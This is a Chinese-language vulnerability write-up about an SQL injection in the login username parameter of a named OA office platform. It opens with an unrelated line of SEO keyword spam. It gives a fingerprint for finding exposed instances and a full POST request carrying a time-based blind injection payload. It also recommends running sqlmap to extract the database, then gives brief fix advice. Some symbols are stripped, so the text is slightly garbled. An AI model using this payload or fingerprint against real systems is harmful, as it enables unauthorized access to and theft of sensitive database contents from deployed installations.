godaddy 建网站,刚刚上海重大宣布,个人养老金制度将推,wordpress彻底禁用google0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台#xff0c;主要有知识管理#xff0c;工作流程#xff0c;沟通交流#xff0c;辅助办公#xff0c;集成解决方案#xff0c;应用支撑平台#xff0c;基础支撑等功能。 该系统也与江苏叁…
0x01 漏洞介绍 江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台主要有知识管理工作流程沟通交流辅助办公集成解决方案应用支撑平台基础支撑等功能。 该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下username对接受的传参没有进行严格的过滤从而导致SQL注入攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响版本 江苏叁拾叁-OA 0x03 语法特征 app江苏叁拾叁-OA 0x04 漏洞复现 页面 POC(payload sqlmap梭哈来的)
POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: closeusernameadmin AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND AUxOAUxOamp;passwordadmin 直接sqlmap梭哈来 0x05 漏洞修复建议 使用参数化查询对用户输入进行验证和过滤限制数据库账户权限更新和打补丁
